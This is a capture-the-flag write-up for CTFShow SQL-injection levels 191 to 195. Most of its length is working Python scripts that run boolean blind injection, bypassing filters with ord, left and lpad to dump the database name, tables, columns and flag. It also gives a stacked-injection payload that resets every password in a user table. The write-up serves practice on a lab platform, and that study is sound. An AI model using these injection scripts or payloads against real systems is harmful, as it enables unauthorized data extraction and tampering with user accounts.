CTFShow-web-vip/SQL 191-195

web 191 Bool (ord instead of ascii)

This challenge is a typical boolean-based blind injection. The only twist is that it filters `char`, but `ord` is still available, so it is essentially no different from the previous level.
In MySQL, ASCII and ORD are both functions that return the ASCII code of a character, and in most cases they are equivalent. Specifically:

  • **ASCII(str)**:

    • Returns the ASCII code of the first character of the string str.
    • Returns 0 if str is the empty string.
    • If str contains more than one character, only the code of the first character is returned.
  • **ORD(str)**:

    • Also returns the ASCII code of the first character of the string str.
    • Functionally identical to ASCII; the implementation is the ASCII function as well.

Summary: in MySQL, ASCII and ORD are equivalent functions, both returning the ASCII code of the first character of a string, and the two can be used interchangeably.

```python
import requests
import time

url = "http://73940d5f-0270-4788-a6ec-d446c8fbaec6.challenge.ctf.show/api/"
flag = ""

for i in range(1, 60):            # substr() positions are 1-based
    hi = 127                      # upper bound of the printable ASCII range
    lo = 32                       # lower bound

    while 1:
        mid = (hi + lo) >> 1      # divide by 2 and round down
        if lo == mid:             # interval has shrunk to one value: that is the character
            flag += chr(mid)
            print(flag)
            break
        # payload = "admin'and (ord(substr((select database()),{},1))<{})#".format(i, mid)
        # payload = "admin'and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i, mid)
        # ctfshow_fl0g
        # payload = "admin'and (ord(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i, mid)
        # id,f1ag
        payload = "admin'and (ord(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i, mid)
        data = {
            "username": payload,
            "password": 0
        }

        res = requests.post(url=url, data=data)
        time.sleep(0.3)
        if res.text.find("8bef") > 0:   # condition was true: the code is below mid
            hi = mid
        else:
            lo = mid
```

web 192 (basic Bool)

This level filters `ord`, but the most basic approach, comparing characters directly, still works.

```python
import requests
import time

url = "http://d5629bd3-6a7d-4742-91a2-2f440dcc5e36.challenge.ctf.show/api/"
char = "}{abcdefghijklmnopqr-stuvwxyz0123456789_"   # candidate alphabet
flag = ""

for i in range(1, 60):            # substr() positions are 1-based
    for s in char:
        payload = "admin'and ((substr((select f1ag from ctfshow_fl0g),{},1)='{}'))#".format(i, s)

        data = {
            "username": payload,
            "password": 0,
        }

        res = requests.post(url=url, data=data)
        time.sleep(0.3)
        if res.text.find("8bef") > 0:   # match: keep the character and move on
            flag += s
            print(flag)
            break
```

web 193 Bool-left

This level filters `substr`, but using `left` to take progressively longer prefixes from the left works just as well.

```python
import requests
import time

url = "http://e73f78ab-a3a0-4cbc-b3c0-d08880061a99.challenge.ctf.show/api/"
flagstr = ",_}{abcdefghijklmnopqr-stuvwxyz0123456789"   # candidate alphabet
enameChar = ""                    # prefix confirmed so far
flag = ""
for i in range(1, 60):
    for mid in flagstr:
        # payload = "admin'and ((left((select database()),{})='{}'))#".format(i, enameChar + mid)
        # ctfshow_web
        # payload = "admin'and ((left((select group_concat(table_name) from information_schema.tables where table_schema=database()),{})='{}'))#".format(i, enameChar + mid)
        # ctfshow_flxg
        # payload = "admin'and ((left((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{})='{}'))#".format(i, enameChar + mid)
        # id,f1ag
        payload = "admin'and ((left((select f1ag from ctfshow_flxg),{})='{}'))#".format(i, enameChar + mid)

        data = {
            "username": payload,
            "password": 0,
        }
        res = requests.post(url=url, data=data)
        time.sleep(0.3)
        if res.text.find("8bef") > 0:   # the guessed prefix matched
            enameChar += mid
            flag += mid
            print(flag)
            break
```

web 194 Bool-lpad

This level bans quite a lot, `substr` among other things, but two functions are still usable here.

  1. lpad does two things, padding and truncation, and which one you get is governed by the third parameter
    • When the guessed length is greater than the actual length
      When we are probing the database, if the length we test is greater than the actual length and the third parameter is non-empty, the string is left-padded with the third parameter; if the third parameter is empty, the query result is also empty
    • When the guessed length is less than the actual length
      No padding happens whether the third parameter is empty or not, and the query result is unaffected; but so that it never interferes with the injection, we leave the third parameter empty by default
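To make the lpad behaviour described above concrete, here is an added Python model of MySQL's LEFT() and LPAD() semantics, written for this writeup and not code from the original or from ctfshow. The function names `mysql_left`, `mysql_lpad` and `prefix_oracle` and the sample value `ctfshow_web` are assumptions, and the model follows MySQL's documented behaviour that LPAD with an empty pad string yields '' whenever padding would be needed.

```python
# Model of MySQL LEFT() and LPAD() string semantics (added illustration, not the
# original writeup's code). Assumption: MySQL behaviour as documented, i.e.
# LPAD(s, n, '') yields '' when padding would be required, and truncates to the
# first n characters when n <= len(s).

def mysql_left(s: str, n: int) -> str:
    """LEFT(s, n): the leftmost n characters of s (all of s if n >= len(s))."""
    return s[:max(n, 0)]

def mysql_lpad(s: str, n: int, pad: str) -> str:
    """LPAD(s, n, pad) as the text describes it:
    - n <= len(s): truncate to the first n characters (behaves like LEFT)
    - n >  len(s): left-pad with `pad` up to length n; an empty `pad` gives ''.
    """
    if n < 0:
        raise ValueError("negative length not modelled")
    if n <= len(s):
        return s[:n]
    if pad == "":
        return ""
    needed = n - len(s)
    fill = (pad * (needed // len(pad) + 1))[:needed]   # repeat pad, cut to size
    return fill + s

def prefix_oracle(secret: str, guess: str, pad: str = "") -> bool:
    """Truth value of  LPAD(secret, LENGTH(guess), pad) = guess, which is the
    condition each request in the web 194 script evaluates."""
    return mysql_lpad(secret, len(guess), pad) == guess

# Constructed sample value standing in for the real database name.
SAMPLE = "ctfshow_web"

def demo() -> dict:
    return {
        "truncate": mysql_lpad(SAMPLE, 3, ""),              # 'ctf', same as LEFT
        "empty_pad_too_long": mysql_lpad(SAMPLE, 20, ""),   # '' (empty result, as the text says)
        "pad_too_long": mysql_lpad(SAMPLE, 14, "x"),        # 'xxxctfshow_web'
        "prefix_ok": prefix_oracle(SAMPLE, "ctfshow_"),     # True
        "prefix_bad": prefix_oracle(SAMPLE, "ctfshow-"),    # False
        "past_end": prefix_oracle(SAMPLE, SAMPLE + "x"),    # False: length exceeded, lpad gives ''
    }
```

Running `demo()` shows why an empty third argument is harmless: past the real length the comparison simply stops matching, so the prefix loop ends rather than producing a padded false match.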

```python
import requests
import time

url = "http://0328ab31-3379-44e8-8081-7fe2b7d5107a.challenge.ctf.show/api/"
flagstr = ",_}{abcdefghijklmnopqr-stuvwxyz0123456789"   # candidate alphabet

enameChar = ""                    # prefix confirmed so far
flag = ""
for i in range(1, 60):
    for mid in flagstr:
        # lpad(..., i, '') with an empty pad string truncates to i characters while i <= actual
        # length and returns '' once i exceeds it, so the comparison just stops matching at the end
        payload = "admin'and ((lpad((select database()),{},'')='{}'))#".format(i, enameChar + mid)
        # ctfshow_web
        # payload = "admin'and ((lpad((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},'')='{}'))#".format(i, enameChar + mid)
        # ctfshow_flxg
        # payload = "admin'and ((lpad((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg'),{},'')='{}'))#".format(i, enameChar + mid)
        # id,f1ag
        # payload = "admin'and ((lpad((select f1ag from ctfshow_flxg),{},'')='{}'))#".format(i, enameChar + mid)

        data = {
            "username": payload,
            "password": 0,
        }
        res = requests.post(url=url, data=data)
        time.sleep(0.3)
        if res.text.find("8bef") > 0:   # the guessed prefix matched
            enameChar += mid
            flag += mid
            print(flag)
            break
```

web 195 Stacked injection

Why stacked injection: the earlier levels all wrapped the value in ' ' or " ", which significantly limits stacked queries, but this one does not, so there is nothing to stop it.

```
username = 0;update`ctfshow_user`set`pass`=1
password = 1
```
The injected SQL statement becomes
```sql
select pass from ctfshow_user where username = 0;update`ctfshow_user`set`pass`=1
```